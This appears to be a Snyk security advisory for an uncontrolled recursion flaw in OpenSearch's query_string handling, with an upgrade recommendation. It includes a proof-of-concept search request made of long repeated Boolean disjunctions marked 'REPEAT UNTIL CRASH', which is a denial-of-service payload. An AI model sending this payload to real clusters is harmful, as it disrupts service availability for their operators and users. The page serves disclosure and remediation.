Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsUpgrade org.opensearch:opensearch to version 2.19.4, 3.3.0 or higher.
Affected versions of this package are vulnerable to Uncontrolled Recursion via the query_string processing. An attacker can exhaust system resources and disrupt service availability by submitting excessively long Boolean or disjunction queries.
GET _search
{
"query": {
"query_string": {
"query": "winAd AND (rises OR rising) winAd AND (rises OR rising) winAd AND (rises OR rising) winAd AND (rises OR rising)
winAd AND (rises OR rising) winAd AND (rises OR rising) winAd AND (rises OR rising) winAd AND (rises OR rising)
winAd AND (rises OR rising) winAd AND (rises OR rising) winAd AND (rises OR rising) winAd AND (rises OR rising)
winAd AND (rises OR rising) winAd AND (rises OR rising) winAd AND (rises OR rising) winAd AND (rises OR rising)
winAd AND (rises OR rising) winAd AND (rises OR rising) winAd AND (rises OR rising) winAd AND (rises OR rising)
winAd AND (rises OR rising) winAd AND (rises OR rising)" ... REPEAT UNTIL CRASH
}
}
}